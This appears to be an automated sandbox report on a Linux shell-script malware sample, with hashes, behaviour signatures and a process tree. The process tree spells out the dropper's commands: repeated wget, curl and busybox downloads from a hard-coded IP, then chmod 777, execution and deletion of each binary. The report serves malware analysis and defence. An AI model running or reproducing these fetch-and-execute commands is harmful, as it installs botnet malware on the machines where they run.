Analysis
-
max time kernel
18s -
max time network
19s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhf image:debian9-armhf-20240418-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
18/10/2024, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
-
Size
10KB
-
MD5
eeab4766daa60dbedfe5ac8ed6379d9b
-
SHA1
9bc333ca6165533554a6ae360550dd5b28050e51
-
SHA256
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad
-
SHA512
9e67b335a4b29e5381bbba0e4b024f17164814614713df6763b598063707277000f155eb47bcdd5ce7c785eaf790fffe084134540be358aa1bea4ce7fadc518c
-
SSDEEP
192:N5pZuLnRjPMfpMnOWrt609vuOZKu6j6MOWrt609uOZKuiJpZuLnIbjPMF:NkjPMfpMnOWrw09vuOZKu6j6MOWrw09z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process
825 chmod
698 chmod
805 chmod
819 chmod
752 chmod
787 chmod
793 chmod
799 chmod
812 chmod
733 chmod
781 chmod
773 chmod
670 chmod
723 chmod
-
Executes dropped EXE 14 IoCs
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information, which can indicate whether the system is a virtual machine.
description ioc Process
File opened for reading /proc/cpuinfo curl
-
description ioc Process
File opened for reading /proc/self/auxv curl
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh1⤵PID:637
-
/bin/rm/bin/rm bins.sh2⤵PID:639
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:659
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:667
-
-
/bin/chmodchmod 777 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- File and Directory Permissions Modification
PID:670
-
-
/tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75./asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Executes dropped EXE
PID:671
-
-
/bin/rmrm asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:672
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:673
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:674
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:694
-
-
/bin/chmodchmod 777 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2./6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:701
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:702
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:709
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:719
-
-
/bin/chmodchmod 777 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ./c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Executes dropped EXE
PID:724
-
-
/bin/rmrm c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:725
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:727
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:732
-
-
/bin/chmodchmod 777 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR./dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:748
-
-
/bin/chmodchmod 777 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD./CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:768
-
-
/bin/chmodchmod 777 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr./Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:780
-
-
/bin/chmodchmod 777 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD./FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:786
-
-
/bin/chmodchmod 777 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a./lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:792
-
-
/bin/chmodchmod 777 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP./C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:798
-
-
/bin/chmodchmod 777 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY./HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:804
-
-
/bin/chmodchmod 777 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT./Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:810
-
-
/bin/chmodchmod 777 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel./MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:818
-
-
/bin/chmodchmod 777 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1./37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:824
-
-
/bin/chmodchmod 777 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu./opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:828
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97